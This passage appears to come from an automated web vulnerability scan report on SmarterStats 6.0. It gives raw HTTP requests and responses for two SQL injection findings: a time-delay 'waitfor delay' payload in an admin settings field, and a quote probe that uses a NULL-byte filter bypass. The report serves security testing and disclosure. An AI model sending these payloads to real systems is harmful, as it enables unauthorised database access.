<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


2.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...[SNIP]...&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5)waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:14:15 GMT
Content-Length: 0


2.4. http://vulnerable.smarterstats.6.0.host:9999/Default.aspx [ctl00%24PageTitle parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Default.aspx

Issue detail

The ctl00%24PageTitle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ctl00%24PageTitle parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /Default.aspx?section=UserDataMining HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Default.aspx?section=UserDataMining
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786

ctl00%24Split%24LP%24ctl01%24dtStart%24dateInput=555-555-0199@example.com&__LASTFOCUS=&ctl00%24PageTitle=%00'&ctl00%24Split%24LP%24ctl01%24dtEnd%24dateInput=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_ClientState=&ctl00%24Split%24LP%24ctl01%24ddChart=NONE&ctl00_Split_LP_ctl01_dtStart_calendar_SD=%5b%5d&ctl00%24Split%24LP%24SessionKey=275a2fda26bf41d0a434458863c81036&ctl00%24Split%24LP%24ctl01%24dtStart=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtStart_dateInput_text=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24ddQuery=INT_DailyActivity&__EVENTTARGET=&ctl00%24PanelLoadedState=%7b%7d&__EVENTARGUMENT=&ctl00_Split_LP_ctl01_dtStart_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtEnd_calendar_SD=%5b%5d&ctl00%24Split%24LP%24ctl01%24ddRows=25&ctl00_Split_LP_ctl01_dtStart_dateInput_ClientState=&ctl00_Split_LP_ctl01_dtEnd_dateInput_text=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtStart_ClientState=&ctl00%24Split%24LP%24ctl01%24ddFilter=32A21FBCC3ED4d24A2E81ABB427296FC&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUcY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydAUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUaY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRFbmQFI2N0bDAwJFNwbGl0JExQJGN0bDAxJGR0RW5kJGNhbGVuZGFyBSNjdGwwMCRTcGxpdCRMUCRjdGwwMSRkdEVuZCRjYWxlbmRhcipOUc8WbZkeVu9zDeg3H%2bPLCcj9P%2bl2rC80zaft0u2D&ctl00_Split_LP_ctl01_dtEnd_dateInput_ClientState=&ctl00%24Split%24LP%24ctl01%24dtEnd=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24txtFilename=Peter+Wiener

Response 1 (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:17:26 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6130
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
   Message - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Error" dir="ltr">
<form name="aspnetForm" method="post" action="frmError.aspx?aspxerrorpath=%2fDefault.aspx" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;Default.aspx</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError"><p>The page or resource that you are accessing is unavailable or an error has occurred.</p>

<p>This error occurred at 10/12/2010 12:17:26 AM and has been logged. Please contact your system administrator.</p></span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='1' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

</form>
</body>
</html>

Request 2

POST /Default.aspx?section=UserDataMining HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Default.aspx?section=UserDataMining
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786

ctl00%24Split%24LP%24ctl01%24dtStart%24dateInput=555-555-0199@example.com&__LASTFOCUS=&ctl00%24PageTitle=%00''&ctl00%24Split%24LP%24ctl01%24dtEnd%24dateInput=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_ClientState=&ctl00%24Split%24LP%24ctl01%24ddChart=NONE&ctl00_Split_LP_ctl01_dtStart_calendar_SD=%5b%5d&ctl00%24Split%24LP%24SessionKey=275a2fda26bf41d0a434458863c81036&ctl00%24Split%24LP%24ctl01%24dtStart=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtStart_dateInput_text=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24ddQuery=INT_DailyActivity&__EVENTTARGET=&ctl00%24PanelLoadedState=%7b%7d&__EVENTARGUMENT=&ctl00_Split_LP_ctl01_dtStart_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtEnd_calendar_SD=%5b%5d&ctl00%24Split%24LP%24ctl01%24ddRows=25&ctl00_Split_LP_ctl01_dtStart_dateInput_ClientState=&ctl00_Split_LP_ctl01_dtEnd_dateInput_text=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtStart_ClientState=&ctl00%24Split%24LP%24ctl01%24ddFilter=32A21FBCC3ED4d24A2E81ABB427296FC&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUcY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydAUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUaY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRFbmQFI2N0bDAwJFNwbGl0JExQJGN0bDAxJGR0RW5kJGNhbGVuZGFyBSNjdGwwMCRTcGxpdCRMUCRjdGwwMSRkdEVuZCRjYWxlbmRhcipOUc8WbZkeVu9zDeg3H%2bPLCcj9P%2bl2rC80zaft0u2D&ctl00_Split_LP_ctl01_dtEnd_dateInput_ClientState=&ctl00%24Split%24LP%24ctl01%24dtEnd=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24txtFilename=Peter+Wiener

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:17:26 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24491
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   .&#x27;&#x27;
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type='text/javascript'>
       if (parent.UpdateSection != null)
           parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Root " dir="ltr">
   
<table id="loadingMessage" class="LoadingMessageTable">
   <tr>
       <td class="LoadingMessageCell">
           <div class="LoadingShadowBox">
               <div class="LoadingMessage">
                   <div class="PageTitle">
                       <div class="RoundedPageTitleLeft">
                           <div class="RoundedPageTitleRight">
                               <img id="ctl00_ctl00_Image1" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
                               <div class="PageTitleText">
                                   Processing</div>
                           </div>
                       </div>
                   </div>
               </div>
               <div class="RoundedBottom">
                   <div class="RoundedLeft">
                       <div class="RoundedRight">
                           <div class="RoundedBottomLeft">
                               <div class="RoundedBottomRight">
                                   <div class="LoadingMessageInner">
                                       <div class="LoadingMessageText">
                                           SmarterStats is loading...</div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
       </td>
   </tr>
</table>
<div class="LoadingGlyph" id="TopBarLoading" style="display: none">
   <img id="ctl00_ctl00_Image2" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
</div>

   <form name="aspnetForm" method="post" action="Default.aspx?section=UserDataMining" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script type="text/javascript">
//<![CDATA[
function ShowHelpRadWindow(){ SpawnHyperWindow('/UserControls/Popups/frmHelp.aspx?url=' + escape(HelpID) + '&extraInfo=' + escape(ExtraHelpID) + '', 330, 200, null); }//]]>
</script>

<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="Services/svcRealTimeService.asmx/js" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$Split$LP$StyledUpdatePanel1',''], ['ctl00$Split$LP$lnkUpdate',''], [], 90, 'ctl00');
//]]>
</script>


       <script type="text/javascript">
           self.GetUpdatesFunc = SSWeb.Services.svcRealTimeService.GetUpdates;
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
